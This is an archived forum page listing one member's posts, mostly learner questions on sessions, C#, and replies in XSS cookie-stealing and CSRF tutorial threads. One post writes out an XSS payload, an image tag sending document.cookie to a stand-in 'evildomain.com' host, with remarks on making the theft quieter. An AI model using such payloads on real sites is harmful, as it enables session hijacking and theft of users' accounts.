This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - fruitcake2212

Pages: [1]
1
Web Oriented Coding / Re: Website not terminating session?
« on: January 06, 2013, 10:54:01 PM »
Quote from: Kulverstukas on January 06, 2013, 09:51:08 PM
You need to read more on sessions.
Cookies had expiration dates and they expire when the server tell your browser that the session is expired or the date expires.
The cookies doesn't have to die when you close the website unless the server was configured to end the session when a connected is lost.

That is how that "keep me signed in" button works. Usually some websites also have a time interval for how long you want to be signed in.

Your right my bad. I misinterpreted this info : "Web browsers normally delete session cookies when the user closes the browser."
So it deletes the session cookie on the client side but not necessary on server-side.
Thank you

2
Web Oriented Coding / Website not terminating session?
« on: January 06, 2013, 09:18:37 PM »
Hi everyone
Not really sure if this is the right section to ask this...

On a website I noticed that even after I log out of my account my session cookie (that I noted down) was still valid. The server does not seem to destroy the session. Even when I close the browser, when I go back to the website and manually add my old cookie value, I'm back to my account as if I never logged out.

I find it weird as it is a session cookie and it is supposed to die when the browser closes.
Does someone know what would be the reason behind it? The server seems to never destroy its sessions.

3
.NET Framework / Re: (C#) IsNumeric
« on: August 08, 2012, 12:59:55 PM »
Quote from: Deque on August 08, 2012, 12:41:24 PM
TryParse is a C# method, not Java.

Yes sorry I've read Satan911's answer too fast. My answer are possibilities for C#

4
.NET Framework / Re: (C#) IsNumeric
« on: August 08, 2012, 11:07:26 AM »
Quote from: Satan911 on August 03, 2012, 04:57:33 PM
There's no isNumeric function in Java either for the String class. You can use Integer.parseInt which will throw an exception if the string is not a number but that's a really bad use of exceptions.

You can use the TryParse method instead, it will not throw exception.

Also, you could use the IsNumeric function of VisualBasic in your C# application. You would need to reference the visualbasic dll in your project

5
Tutorials / Re: Stealing Cookie With XSS
« on: July 01, 2012, 02:46:53 AM »
Quote from: ande on June 30, 2012, 06:11:11 PM
make sure the + document.cookie is inside the quotes tho.

thanks, I wasn't sure about that

6
Tutorials / Re: Stealing Cookie With XSS
« on: June 30, 2012, 06:03:43 AM »
Yeah sorry I thought it was not worth to start a new thread for this lil question

but... wouldn't it look more like this? : <img src="http://evildomain.com/image.php?cookie=" + document.cookie />

7
Tutorials / Re: Stealing Cookie With XSS
« on: June 26, 2012, 10:26:33 PM »
Quote from: ande on August 06, 2011, 08:05:27 PM
I like loading a IMG tag with the php script's URL better than redirecting the entire thing. Simply making a 1x1 transparent image once the PHP script is done loading. Makes it slightly more silent.

This seems a nice trick
The image must be inside a <script> tag for this to work? (cos we need document.cookie)

edit: nice tut 1Mirek btw

8
Found it on the Webs / Re: inside job(the movie)
« on: June 23, 2012, 06:07:33 AM »
Yes it won the 2011 Oscar for Best Documentary.
It is narrated by Matt Damon

I like what Charles H. Ferguson said when he accepted his Oscar.
You can watch his short speech here http://www.youtube.com/watch?v=mpz5DVwnbnk

9
Tutorials / Re: CSRF Tutorial by Connection
« on: June 23, 2012, 05:59:10 AM »
I see!
Didn't know about $_REQUEST.
Wow, that answers perfectly my question. Thanks Ande.

10
Tutorials / Re: CSRF Tutorial by Connection
« on: June 23, 2012, 03:50:02 AM »
Thanks for the great tut.
There is however one thing that I didn't really understand clearly :

Quote from: I_Learning_I on April 04, 2011, 01:09:08 PM

When we append POST parameters to a base URL we start with adding a ? to the base URL and then combine parameters by linking them with a &. An example is http://base.url/goes/here?first=parameter&second=parameter


I thought that the parameters in URLs were GET parameters, so how is this possible?
I tried it on a website; I used Tamper Data to know what the Post Parameters of the Form are, and I then made an URL with the parameters appended to it and it worked great! Nonetheless I still don't understand how it works/how it is possible to pass Post parameters in the URL. Why on some site you can pass the post parameters in the url, and on some other sites you can't ?

I know that in PHP, to get Post variables it is 
Code: [Select]
$_POST['variblename'] and to get Get variables we do 
Code: [Select]
$_GET['variblename'];
Sorry if this sounds like a noob (which I am) question. I'd like to know more about it. If someone can enlighten me, it'd be very appreciated.

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.